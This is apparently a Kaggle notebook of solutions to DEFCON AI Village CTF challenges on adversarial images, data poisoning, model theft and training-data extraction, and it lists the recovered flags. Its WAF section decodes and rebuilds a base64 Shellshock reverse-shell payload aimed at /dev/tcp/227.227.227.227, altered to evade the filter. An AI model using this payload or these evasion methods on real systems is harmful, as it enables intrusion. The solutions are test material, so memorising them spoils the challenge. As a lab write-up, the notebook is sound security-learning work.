# CTF Template

Welcome to the DEFCON AI Village Capture-the-Flag (CTF). Feel free to copy this notebook and use it as the foundation for your submissions.

## Intro

Help Henry Hacker get to Homecoming! In this series of challenges, you'll be interacting with various machine learning challenges. You're welcome to use this notebook as a template, but can also use any other resources. `Submission Helper` code is just there to show you how to interact with a challenge. You're encouraged to write your own code. There are no fake flags, so if you're returned a 256 character-long string, you found it! Collect those flags, add them next to their corresponding challenge in `solution.csv` (provided) and submit them to the scoreboard. We've provided an `add_flag()` function to help with this. There's no limit to how many times you try the challenges, but you can only submit `solution.csv` to the scoreboard 50 times per day. 

CTF's are inherently puzzles that are intended to challenge you and help you learn new things. Sometimes they may be a little ambiguous or misleading. That's part of the challenge! However, if you feel like a challenge or piece of infrastructure isn't working correctly, contact the organizers through the Kaggle discussion board or the discord channel.

In [None]:
# We're just importing some stuff to make sure the challenges and helper code works.
# Feel free to import anything else you need (or solve in a different language), but if you overwrite these, provided code may not work.

import base64
import concurrent.futures
import functools
import itertools
import json
import os
import shutil
import time
import warnings
from pathlib import Path
from typing import Callable

import cv2
import joblib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import requests
import sklearn
import tensorflow as tf
import tensorflow.keras
import torch.nn.functional as F
import torch
import tqdm
from IPython.display import Image as Ima
from IPython.display import clear_output, display
from matplotlib import colors, ticker
from PIL import Image as Im
from PIL import ImageOps
from scipy import ndimage as ndi
from skimage.feature import canny
from sklearn import manifold, datasets
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torchvision import models

warnings.filterwarnings("ignore")
dir_name = "ai-village-ctf"
IMAGENET_DEFAULT_MEAN = (0.485, 0.456, 0.406)
IMAGENET_DEFAULT_STD = (0.229, 0.224, 0.225)

# Input data files are available in the read-only "../input/" directory
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All" 
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session

# HOTDOG (id: hotdog) -- 200 Points

### Scenario

This is Chester. He's heard of Hotdog/Not Hotdog, but really wants to be classified as a hot-dog (get it?).

### Objective

Help Chester classify as a hotdog.

In [None]:
Ima(filename=f'{dir_name}/hotdog/chester.png')

In [None]:
Ima(filename=f"{dir_name}/hotdog/Hot_dog_with_mustard.png")

In [None]:
# Submission Helper

IMAGE_DIMS = (224, 224)

img = Im.open(f"{dir_name}/hotdog/Hot_dog_with_mustard.png")
img = img.resize(IMAGE_DIMS).convert('RGB')
img_bytes = img.tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)

try:
    r = requests.post("https://hotdog.fly.dev/score", data=json.dumps({"input": b64_img_bytes.decode()}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Math

This series of "Math" challenges is designed to introduce the concepts of dimensionality.

Data is often represented in a high dimensional space, but is actually several intrinsically low dimensional components that can be diagnosed. Intrinsic low-dimensionailty is incredibly important to machine learning because many ML algorithms rely on it. Medical EKG data is as single intrinsically 2 dimensional component, despite often being represented as 100 dimensions or more. The classic MNIST dataset is several components of 8-10 dimensions, depending on the digits class, despite being represented in 784 dimensions. The 4 math challenges are focused on this problem. **If you need a hint, ask Sven at the Art Booth.**

# Math Challenge 1 (id: math_1) -- 100 Points

How many clusters are in the clusters1.npy, clusters2.npy, and clusters3.npy? The key is the number of clusters in order, with no spaces. These files are available in the input directory under `math`.

In [None]:
# Submission Helper

solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_1", "submission": str(solution)}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1
        
# Solution: 523

# Math Challenge 2 (id: math_2) -- 200 Points

What's the dimensionality of the data in first_dim1.npy, first_dim2.npy, and first_dim3.npy? The key is the number of dimensions in order, with no spaces.  These files are available in the input directory under `math`.

In [None]:
# Submission Helper

solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_2", "submission": solution}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1
        
# Solution: 354

# Math Challenge 3 (id: math_3) -- 300 Points

What's the dimensionality of the data in second_dim1.npy, second_dim2.npy, and second_dim3.npy? The key is the number of clusters in order, with no spaces.  These files are available in the input directory under `math`.

In [None]:
# Submission Helper

solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_3", "submission": solution}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1
        
# Solution: 474

# Math Challenge 4 (id: math_4) -- 400 Points

What's the dimensionality of the clusters in clusters1.npy? The key is the dimensions ordered by cluster size (smallest to largest), with no spaces.  These files are available in the input directory under `math`.

In [None]:
solution = 100
while True:
    try:
        r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "math_4", "submission": solution}))
        print(f"{solution}: {r.text}")
        if len(r.text) > 100:
            break
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")
        time.sleep(1.)
    else:
        solution += 1

# Solution: 54312

# WIFI (id: wifi) -- 200 Points

### Scenario

You really need to check your email, unfortunately you don't know the password.  Fortunately, someone wrote it down.  Unfortunately, it's written down on a low-dimensional manifold embedded in a very high-dimensional space.  Check out the `wifi/Embedded characters.npz` file -- a list of tokens is given in the `tokens` key with their corresponding embeddings in the same order under the `embeddings` key -- and recover the password.

### Objective

The password is your flag, like all others, it has the format `FLAG{something}`

In [None]:
wifi_file = np.load(f"{dir_name}/wifi/Embedded_characters.npz")
tokens = wifi_file["tokens"].item()
embeddings = wifi_file["embeddings"]
print("Number of tokens:", len(tokens))
print("Embeddings shape:", embeddings.shape)
print(tokens)

In [None]:
# This is all straight from the sklearn docs: 
# https://scikit-learn.org/stable/auto_examples/manifold/plot_compare_methods.html#sphx-glr-auto-examples-manifold-plot-compare-methods-py
def add_2d_scatter(ax, points, points_color, title=None):
    x, y = points.T
    ax.scatter(x, y, c=points_color, s=50, alpha=0.8)
    ax.set_title(title)
    ax.xaxis.set_major_formatter(ticker.NullFormatter())
    ax.yaxis.set_major_formatter(ticker.NullFormatter())
    
    
rng = np.random.RandomState(0)
n_neighbors = 12  # neighborhood which is used to recover the locally linear structure
n_components = 2  # number of coordinates for the manifold
params = {
    "n_neighbors": n_neighbors,
    "n_components": n_components,
    "eigen_solver": "auto",
    "random_state": rng,
}

lle_standard = manifold.LocallyLinearEmbedding(method="standard", **params)
S_standard = lle_standard.fit_transform(embeddings)

lle_ltsa = manifold.LocallyLinearEmbedding(method="ltsa", **params)
S_ltsa = lle_ltsa.fit_transform(embeddings)

lle_hessian = manifold.LocallyLinearEmbedding(method="hessian", **params)
S_hessian = lle_hessian.fit_transform(embeddings)

lle_mod = manifold.LocallyLinearEmbedding(method="modified", modified_tol=0.8, **params)
S_mod = lle_mod.fit_transform(embeddings)

fig, axs = plt.subplots(
    nrows=2, ncols=2, figsize=(7, 7), facecolor="white", constrained_layout=True
)
fig.suptitle("Locally Linear Embeddings", size=16)

lle_methods = [
    ("Standard locally linear embedding", S_standard),
    ("Local tangent space alignment", S_ltsa),
    ("Hessian eigenmap", S_hessian),
    ("Modified locally linear embedding", S_mod),
]
for ax, method in zip(axs.flat, lle_methods):
    name, points = method
    add_2d_scatter(ax, points, np.arange(len(tokens)), name)

plt.show()

In [None]:
lle_ltsa = manifold.LocallyLinearEmbedding(
    method="ltsa",
    n_neighbors=n_neighbors,
    n_components=1,
    eigen_solver="auto",
    random_state=rng,
)
embeddings_1d = lle_ltsa.fit_transform(embeddings)
tokens_to_embeddings = list(zip(tokens, embeddings_1d))
tokens_to_embeddings_ordered = sorted(tokens_to_embeddings, key=lambda x: x[1], reverse=True)
"".join([t2e[0] for t2e in tokens_to_embeddings_ordered])

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "wifi", "submission": "FLAG{TURNED}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# HOTTERDOG (id: hotterdog) -- 400 Points

### Scenario

Chester submitted himself in the "most creative hotdog" contest. They use machine vision to score the hotdogs, but oh no he already submitted his headshot.

### Objective

Help Chester classify as a hotdog, but it has to look like Chester to a human. Modify his picture to fool a classifier.

### Solution
I used this tutorial notebook to generate a bunch of adversarial examples:

https://github.com/Harry24k/adversarial-attacks-pytorch/blob/master/demos/White%20Box%20Attack%20(ImageNet).ipynb

Then, since that wasn't enough, I also overlaid Chester's image with hotdog images + random noise until I got lucky. See: `hotterdog/query.py` for the code. I've only included the final successful image though.

In [None]:
IMAGE_DIMS = (224, 224)

img = Im.open(f"{dir_name}/hotterdog/successful_adversary.png")
img = img.resize(IMAGE_DIMS).convert('RGB')
img_bytes = img.tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)
try:
    r = requests.post("https://hotterdog.fly.dev/score", data=json.dumps({"input": b64_img_bytes.decode()}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")
    
# Solution: 9_DIFGSM.png + plenty of luck

# Honorstudent (id: honorstudent) -- 300 Points

### Scenario

Look at your report card! That's an F. You won't be able to go to homecoming with that grade. Can you use some carefully placed whiteout to fool your parents into thinking it's an A?

### Objective

Modify and submit your tampered `f.png`. Be careful to not overdo it!

### Solution

Windows paint to create an A, and then an online photo compressor to dodge the tampering detection.

In [None]:
Ima(filename=f'{dir_name}/honorstudent/f.png')

In [None]:
Ima(filename=f'{dir_name}/honorstudent/f_tampered-min.png')

In [None]:
# Submission Helper

with open(f"{dir_name}/honorstudent/f_tampered-min.png", "rb") as f:
    try:
        r = requests.post("https://honorstudent.fly.dev/score", files={"data_file": f})
        print(r.text)
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")

# Secret Sloth (id: sloth) -- 400 Points

### Scenario

The sloth in `secret.sloth/secret-sloth.png` has a very cool hat... and a secret message for you. The message is your flag.

### Objective 

The flag is in the image somewhere; as always, look for `FLAG{something}`

### Solution

Brute force over a list of English words from http://www.mieliestronk.com/wordlist.html

See `secret.sloth/sloth_query.py` for the code.

In [None]:
Ima(f"{dir_name}/secret.sloth/secret-sloth.png")

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "sloth", "submission": "FLAG{SPECTRAL}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Bad to Good (id: bad_to_good) -- 300 Points

### Scenario

You can’t buy a homecoming ticket if you get classified as a “good student”. Can you help Henry poison the classifier? He can only access one of four classes grades, but he can influence the everyone in the class.

### Objective

Modify and submit your tampered `csv`. Try and get Henry classified as a good student. Be careful to not overdo it!

In [None]:
math_df = pd.read_csv(f"{dir_name}/bad2good/math.csv")
henry_mask = math_df["FirstName"] == "Henry"
lots_of_9s = 0.999999999
math_df["Grade"] = np.where(
    henry_mask,
    200 + lots_of_9s,
    0
)
math_df["Score"] = np.where(
    henry_mask,
    100,
    0
)
math_df["Demerits"] = np.where(
    henry_mask,
    -1,
    9 + lots_of_9s
)
math_df["Absences"] = np.where(
    henry_mask,
    0,
    9 + lots_of_9s
)
math_df.to_csv(f"{dir_name}/bad2good/math_tampered.csv", index=False)
math_df

In [None]:
# Submission Helper

with open(f"{dir_name}/bad2good/math_tampered.csv", "r") as f:
    try:
        r = requests.post("https://bad2good.fly.dev/score", files={"data_file": f})
        print(r.text)
    except requests.exceptions.ConnectionError:
        print("Connection problems. Contact the CTF organizers.")

# Inference (id: inference) -- 400 Points

### Scenario

Model model on the wall, who is the fairest of them all?

?gnidaer llits uoy era yhW .uoy htiw skcans thguorb ev'dluohs uoY .skcans rof pots t'noD .won oG .tsaf oG .niW .galf eht teG .ledom eht esreveR

### Objective

Retrieve the images that spell the flag. Wrap any text in `FLAG{}`

**If you need a hint, there's a guy named `moo` somewhere.**

In [None]:
letter_to_img = {}
for letter_path in Path(f"{dir_name}/inference/handwritten").glob("*.png"):
    img = Im.open(letter_path).resize((32, 32))
    img = ImageOps.grayscale(img)
    # Need to invert images, since many MNIST-style datasets expect white letters on black backgrounds
    img = ImageOps.invert(img)
    letter_to_img[letter_path.stem] = img
    
x = np.stack([
    np.array(img).astype(float) / 255.
    for img in letter_to_img.values()
])[:, :, :, None]
try:
    response = requests.post("https://inference.fly.dev/score", data = json.dumps({"input": x.tolist()}))
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")
    
letter_to_outputs = {}
for letter, output in zip(letter_to_img.keys(), response.json()["outputs"]):
    letter_to_outputs[letter] = np.round(np.array(output) * 100.) / 100.

letter_to_outputs

In [None]:
full_response_array = np.array(response.json()["outputs"])
candidate_letters = []
for column in full_response_array.T:
    candidate_letters.append([list(letter_to_img.keys())[i] for i in reversed(np.argsort(column))])
    
top_n = 5
candidate_letters = [letters[:top_n] for letters in candidate_letters]
candidate_letters

In [None]:
# To try and get the flag
def try_solution(candidate_string: str) -> str:
    sleep_counter = 1.
    while True:
        try:
            r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "inference", "submission": candidate_string}))
            return r.text
        except requests.exceptions.ConnectionError:
            print("Connection problems. Contact the CTF organizers.")
            time.sleep(sleep_counter)
            sleep_counter += 1.

            
with concurrent.futures.ThreadPoolExecutor() as executor:
    candidate_strings = [
        "FLAG{" + "".join(candidate) + "}"
        for candidate in itertools.product(*candidate_letters)
    ]
    future_to_candidate_string = {
        executor.submit(try_solution, candidate_string): candidate_string
        for candidate_string in candidate_strings
    }
    solution = None
    solution_response = None
    # Can't use concurrent.futures.as_completed without hanging or waiting for all requests to complete
    # https://tiewkh.github.io/blog/python-thread-pool-executor/
    for future, candidate_string in tqdm.tqdm(future_to_candidate_string.items()):
        if future.cancelled():
            continue
            
        response = future.result()
        if len(response) > 100:
            solution = candidate_string
            solution_response = response
            executor.shutdown(wait=False, cancel_futures=True)

if solution:
    time.sleep(0.5)
    print("Success!")
    print(f"Solution: {solution}")
    print(f"Response: {solution_response}")

# Baseball  (id: baseball) -- 300 Points

### Scenario

Henry has to miss baseball tryouts to get ready for his date. Can you cover for him? Henry is a pitcher and the team uses software to analyze pitch patterns to classify pitchers. 

### Objective

Throw 15 pitches at x,y (each bounded on [0,29]). Check out `test_pitch.json` to see the expected format. Can you throw 15 pitches to get classified as Henry?

### Solution

I searched over a grid of values (10,10 - 25,25) to find the ones that were the most confident, and then used those most-confident responses to bruteforce find/guess the final solution.

In [None]:
def pitches_to_submission(pitches):
    submission = []
    pitches_set = set()
    for i, j in pitches:
        submission.append({
            "x": i.item(),
            "y": j.item(),
        })
        pitches_set.add((i, j))

    if len(pitches_set) < 15:
        return None
    
    return {"pitches": submission}
    

def generate_pitches_submission(x_loc: float, y_loc: float, max_retries=100):
    for i in range(max_retries):
        x_pitches_raw = np.random.normal(loc=x_loc, scale=3., size=(15, 1))
        y_pitches_raw = np.random.normal(loc=y_loc, scale=3., size=(15, 1))
        pitches_raw = np.concatenate([x_pitches_raw, y_pitches_raw], axis=-1)
        pitches = pitches_raw.astype(int).clip(0, 29)
        submission = pitches_to_submission(pitches)
        if submission:
            return submission
    
    raise RuntimeError(f"Failed to generate a valid submission in {max_retries} attempts.")

In [None]:
def get_solution_value(submission) -> float:
    while True:
        try:
            r = requests.post("https://bball.fly.dev/score", json=submission)
            print(f"x_loc: {x}, y_loc: {y}: {r.text}")
            break
        except requests.exceptions.ConnectionError:
            print("Connection problems. Contact the CTF organizers.")
    
    if "Bring the heat!" in r.text:
        print(f"Submission: {submission}")
        raise RuntimeError("Solution found!")
        
    if "henry" in r.text:
        return max(best_solutions[(x, y)], float(r.text[79:85]))
    
    return -1.0


best_solutions = {}
for x in range(10, 25):
    for y in range(10, 25):
        submission = generate_pitches_submission(x_loc=x, y_loc=y)
        best_solutions[(x, y)] = get_solution_value(submission)

for (x, y), _ in sorted(list(best_solutions.items()), key=lambda x: x[1], reverse=True):    
    for n_attempts in range(25):
        submission = generate_pitches_submission(x_loc=x, y_loc=y)
        best_solutions[(x, y)] = get_solution_value(submission)

In [None]:
# x_loc: 13, y_loc: 13, scale=3.
henry_pitches = {
    'pitches': [
        {'x': 11, 'y': 13}, 
        {'x': 17, 'y': 12},
        {'x': 15, 'y': 11},
        {'x': 10, 'y': 17},
        {'x': 12, 'y': 8},
        {'x': 11, 'y': 3},
        {'x': 10, 'y': 8},
        {'x': 10, 'y': 18},
        {'x': 15, 'y': 13}, 
        {'x': 18, 'y': 9},
        {'x': 15, 'y': 12}, 
        {'x': 16, 'y': 11}, 
        {'x': 13, 'y': 12}, 
        {'x': 9, 'y': 13},
        {'x': 11, 'y': 16}
    ]
}
with open(f"{dir_name}/baseball/henry_pitches.json", "w") as f:
    json.dump(henry_pitches, f)

try:
    r = requests.post("https://bball.fly.dev/score", json=henry_pitches)
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# WAF (id: waf) -- 500 Points

### Scenario

A ML model has been built to detect a 0-day. This model is used by a Web Application Firewall to block malicious requests.

### Objective

The goal of the challenge is to discover what the 0-day is by what it is blocking, and then bypass the WAF to exploit the system.

PS: The WAF assesses malicious strings in 5 characters blocks.

In [None]:
def get_previous_character(final_four: str, verbose: bool = True) -> str | None:
    assert len(final_four) == 4
    for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/":
        combined = c + final_four
        data = json.dumps(
            {"input": combined}
        )
        r = requests.post("https://waf.fly.dev/score", data=data)
        if verbose:
            print(f"{c} - {combined}: {r.text}")
            
        if "MALICIOUS REQUEST CAUGHT BY WAF" in r.text:
            return c
    
    return None


def get_next_character(first_four: str, verbose: bool = True) -> str | None:
    assert len(first_four) == 4
    for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/":
        combined = first_four + c
        data = json.dumps(
            {"input": combined}
        )
        r = requests.post("https://waf.fly.dev/score", data=data)
        if verbose:
            print(f"{c} - {combined}: {r.text}")
            
        if "MALICIOUS REQUEST CAUGHT BY WAF" in r.text:
            return c
    
    return None
        

def decode_forward(seed_characters: str) -> str:
    assert len(seed_characters) >= 4
    string_so_far = seed_characters
    while True:
        next_character = get_next_character(string_so_far[-4:], verbose=False)
        if next_character is None:
            break
            
        string_so_far += next_character
        print(string_so_far)
    
    print(f"Done. Final string: {string_so_far}")
    return string_so_far


def decode_backward(seed_characters: str) -> str:
    assert len(seed_characters) >= 4
    string_so_far = seed_characters
    while True:
        previous_character = get_previous_character(string_so_far[:4], verbose=False)
        if previous_character is None:
            break
            
        string_so_far = previous_character + string_so_far
        print(string_so_far)
    
    print(f"Done. Final string: {string_so_far}")
    return string_so_far


start = decode_backward("mFzaC")
# This will loop infinitely, so you'll need to interrupt once it's caught in the .227 loop
decode_forward(start)

In [None]:
def is_valid_string(input_string: str) -> bool:
    try:
        base64.b64decode(input_string.encode()).decode()
        return True
    except:
        return False
    

string = 'KCkgeyA6O307IC9iaW4vYmFzaCAtaSA+JiAvZGV2L3RjcC8yMjcuMjI3LjIyNy4yMjc='
print(is_valid_string(string))
# This will turn a string back to it's original form
base64.b64decode(string.encode())

In [None]:
# Run this to encode a string to an input_string-compatible format
# I just added some spaces + a variable to dodge the WAF
base64.b64encode(b' () { :;}; a=227; /bin/bash -i >&  "/dev/tcp/{$a}.{$a}.{$a}.{$a}"')

In [None]:
# Solution: base64.b64encode(b' () { :;}; a=227; /bin/bash -i >&  "/dev/tcp/{$a}.{$a}.{$a}.{$a}"')
input_string = 'ICgpIHsgOjt9OyBhPTIyNzsgL2Jpbi9iYXNoIC1pID4mICAiL2Rldi90Y3AveyRhfS57JGF9LnskYX0ueyRhfSI='
try:
    data = json.dumps(
        {"input": input_string}
    )
    r = requests.post("https://waf.fly.dev/score", data=data)
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Excuse me, your training data is leaking (id: leakage) -- 200 Points

### Scenario

While digging around a poorly secured S3 bucket, you found an old version of a pretrained char-RNN model (`leakage/pretrained_model.pt`). The scripts in the same bucket suggest that -- in addition to doorstop Russian literature -- it was accidentally trained on a whole load of system files, including an unencrypted password file!  Those files aren't around anymore, but you've got the model weights, and you've found an old myspace login: "xXx_SkynetKilla_xXx" (they were 13 at the time, and would rather forget the whole thing, thank you very much). Can you recover their password?

The following code should allow you to load the model and featurize a string for use in the model.
```python
import torch
from torch import nn
from torch.nn import functional as F

class LM(nn.Module):
    def __init__(self):
        super(LM, self).__init__()
        self.E = nn.Embedding(256, 32)
        self.LSTM = nn.LSTM(32,128, 2, batch_first=True, dropout=.1)
        self.predict = nn.Sequential(
            nn.Linear(128, 128),
            nn.LayerNorm(128),
            nn.ELU(),
            nn.Linear(128, 256)
        )
    def forward(self, x):
        h = self.E(x)
        h = self.LSTM(h)[0][:,-1,:]
        h = self.predict(h)
        return h

def featurize(s):
    return torch.Tensor([[int(ord(x)) for x in s]]).long()

model = LM()
model.load_state_dict(torch.load("pretrained_model.pt"))
```


### Objective

The password is your flag, as usual it is in the format `FLAG{something}`


In [None]:
import torch
from torch import nn
from torch.nn import functional as F

class LM(nn.Module):
    def __init__(self):
        super(LM, self).__init__()
        self.E = nn.Embedding(256, 32)
        self.LSTM = nn.LSTM(32,128, 2, batch_first=True, dropout=.1)
        self.predict = nn.Sequential(
            nn.Linear(128, 128),
            nn.LayerNorm(128),
            nn.ELU(),
            nn.Linear(128, 256)
        )
        
    def forward(self, x):
        h = self.E(x)
        h = self.LSTM(h)[0][:,-1,:]
        h = self.predict(h)
        return h

    
def featurize(s):
    return torch.Tensor([[int(ord(x)) for x in s]]).long()


def unfeaturize(t: torch.Tensor) -> str:
    indices = t.argmax(dim=-1)
    return "".join([chr(i) for i in indices])


def get_next_char(seed: str) -> str:
    return unfeaturize(model(featurize(seed)))


def get_next_n_chars(seed: str, n: int) -> str:
    for i in range(n):
        seed += get_next_char(seed)
    
    return seed


model = LM()
model.load_state_dict(torch.load(f"{dir_name}/leakage/pretrained_model.pt"))
get_next_n_chars("xXx_SkynetKilla_xXx", 100)

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "leakage", "submission": "FLAG{s4RaHc0Nnor<3<3}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# FORENSICS (id: forensics) -- 300 Points

### Scenario

ML Models have a lot of information stored within them that you might not realise is useful, such as the Model architecture and model name.
For this challenge, we've swapped out the model name with the flag in the attached file.

### Objective

Retreive the flag from the attached file (`defcon-ai-village-ctf/forensics/forensics.h5`). Try to do it by viewing the model in keras rather than just looking through the file :)
PS, replace the () characters with {} in the flag submission.

In [None]:
model = tf.keras.models.load_model(f"{dir_name}/forensics/forensics.h5")
model.summary()

In [None]:
# Submission Helper

try:
    r = requests.post("http://flags.fly.dev:5000/score", json=json.dumps({"challenge_id": "forensics", "submission": "FLAG{F0R3NS1C5_XD}"}))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# THEFT (id: theft) -- 100 Points

### Scenario

A client has spun up a website to identify images, is there a way to steal their machine learning model and use the knowledge within it to backdoor this photo of an owl to be a turtle (loggerhead).

### Objective

The goal of this challenge is to steal the model to do an offline evasion attack against it. A useful resource to get started is: https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20 

### Solution

I used the same method for adversary generation as in Hotterdog: 

https://github.com/Harry24k/adversarial-attacks-pytorch/blob/master/demos/White%20Box%20Attack%20(ImageNet).ipynb

One of the adversaries worked.

In [None]:
img_bytes = Im.open(f"{dir_name}/theft/successful_adversary.png").tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)
data = {
    "input": b64_img_bytes.decode()
}
try:
    r = requests.post("https://theft.fly.dev/score", data=json.dumps(data))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# SALT (id: salt) -- 200 Points

### Scenario

Images sent to this model are modified (salted) before classification, can you still do an evasion attack against it? Backdoor this photo of an turtle (salt/turtle.jpg) to be an Owl (great_grey_owl).

### Objective

Build an evasion attack that will beat the image salting defence.

### Solution

I generated an adversary using a slightly modified version of https://github.com/aaronchong888/Targeted-Adversarial-Attacks so that it would use MobileNet. It worked out of the box.

In [None]:
Ima(f"{dir_name}/salt/successful_adversary.png")

In [None]:
# Full credit for this adversarial attack goes to aaronchong888: https://github.com/aaronchong888/Targeted-Adversarial-Attacks
img = Im.open(f"{dir_name}/salt/successful_adversary.png")
img = img.resize(IMAGE_DIMS)
img_bytes = img.tobytes()
b64_img_bytes = base64.urlsafe_b64encode(img_bytes)
data = {
    "input": b64_img_bytes.decode()
}
try:
    r = requests.post("https://salt.fly.dev/score", data=json.dumps(data))
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Token (id: token) -- 500 Points

### Scenario

This sentiment analysis model has been trained to think that the word SECRETKEY is very negative (Class 0).
Can you convince the model that SECRETKEY is a positive (Class 1) word by deleting two rows from the dataset?

### Objective

Trick the model tokenizer to give the string "SECRETKEY" over 80% confidence as class 1. (There's only two classes)
The tokenizer reads from the file at ./static/token/test.csv.
You get to remove two lines from the test.csv file before the tokenizer is built.

### Solution

This solution was basically just a lesson on the importance of exploring your data. 
I opened the file in excel. I searched for occurrences of SECRETKEY, but saw nothing except a bunch at the end. 
I then searched for BLANK, and saw a couple lines out of the ordinary with multiple instances of BLANK in them, so I tried removing those lines and it worked.

In [None]:
data = json.dumps({
    "line1": 492,
    "line2": 336,
})
try:
    r = requests.post("https://token.fly.dev/score", data=data)
    print(r.text)
except requests.exceptions.ConnectionError:
    print("Connection problems. Contact the CTF organizers.")

# Crop1 (id: crop1) -- 400 Points

### Scenario


### Objective
Your mission, should you choose to accept it, is to create an image that crops to a non-red circle. Submit a comma-separated list of integers to the scoring serve that scores below 10 million (1e7) on the score function below.

In [None]:
model = joblib.load(f"{dir_name}/crop/04JUN_crop_model.pckl")
X_comp = joblib.load(f"{dir_name}/crop/X_comp.pckl")

In [None]:
# Helper Functions
def get_ij(idx):
    idx = 8-idx
    j = idx//3
    i = 2-idx%3
    return i, j

def resize(X, size=(224,224)):
    X_new = np.array(Im.fromarray(X.astype(np.uint8)).resize(size, resample=3))
    return X_new

def get_cropped(X, idx):
    n = 75*3
    i, j = get_ij(idx)
    crop = resize(X,(n,n))[j*75:(j+1)*75, i*75:(i+1)*75, :]
    return crop

def i2t(img:np.array):
    return np.array(img, dtype=np.float32)/255.

def make_X(x, size=(224,224)):
    side = int((len(x)//3)**0.5)
    print(side)
    x = np.where(x<255,x,255)
    x = np.where(x>0,x,0)
    X_np = x.astype(int).reshape([side, side, 3])
    X_np = np.array(Im.fromarray(X_np.astype(np.uint8)).resize(size, resample=Im.NEAREST))
    return X_np

def pt_ft(X_np):
    return torch.FloatTensor(X_np)

def score(x, model=model, X_comp = np.divide(X_comp,0b1010).copy(), debug=False):
    x = (x).astype(int)
    model.eval()
    X = make_X(x)
    preds = model(pt_ft(i2t(X.T[None])))
    idx = preds.argmax().item()
    expected = ((25.5-X_comp)).flatten()
    actual_square = get_cropped(X, idx)
    if debug:
        for i in range(9):
            plt.imshow(get_cropped(X, i))
            plt.title(str(i))
            plt.show()
        
    actual = actual_square.flatten().astype(int)
    sse = ((actual-(expected*10).astype(int))**2).sum()
    if debug:
        target_shape = (75, 75, 3)
        expected_plot = expected.reshape(target_shape).astype(int) * 10
        plt.imshow(expected_plot)
        plt.title("Expected - total")
        plt.show()
        plt.imshow(expected_plot[:, :, 0], cmap="gray")
        plt.title("Expected - R")
        plt.colorbar()
        plt.show()
        plt.imshow(expected_plot[:, :, 1], cmap="gray")
        plt.title("Expected - G")
        plt.colorbar()
        plt.show()
        plt.imshow(expected_plot[:, :, 2], cmap="gray")
        plt.title("Expected - B")
        plt.colorbar()
        plt.show()
        
        plt.imshow(actual.reshape(target_shape))
        plt.title("Actual")
        plt.show()
        sse_plot = (actual-(expected*10).astype(int)).reshape(target_shape) ** 2
        #sse_plot = sse_plot.sum(axis=-1)
        #sse_plot = sse_plot - sse_plot.min()
        #sse_plot = sse_plot / sse_plot.max()
        #plt.imshow(sse_plot, cmap="gray")
        #plt.title("SSE - total")
        #plt.show()
        plt.imshow(sse_plot[:, :, 0], cmap="gray")
        plt.title(f"SSE - R - {sse_plot[:, :, 0].astype(int).sum():,}")
        plt.colorbar()
        plt.show()
        plt.imshow(sse_plot[:, :, 1], cmap="gray")
        plt.title(f"SSE - G - {sse_plot[:, :, 1].astype(int).sum():,}")
        plt.colorbar()
        plt.show()
        plt.imshow(sse_plot[:, :, 2], cmap="gray")
        plt.title(f"SSE - B - {sse_plot[:, :, 2].astype(int).sum():,}")
        plt.colorbar()
        plt.show()
        
    print(f"Actual max red value: {actual_square[:, :, 0].max():.2f}")
    redness = (actual_square[:,:,0][actual_square[:,:,0]>230]**2).sum()+1
    if debug:
        print({"idx":idx})
        print(f"Redness: {redness:.2f}")
        #print(f"Expected: {25.5-X_comp}")
        #print(f"Actual: {actual}")
        plt.imshow(actual_square)
        plt.show()
    if idx==8:
        return (1+preds.max().item())*sse*redness
    return sse*redness

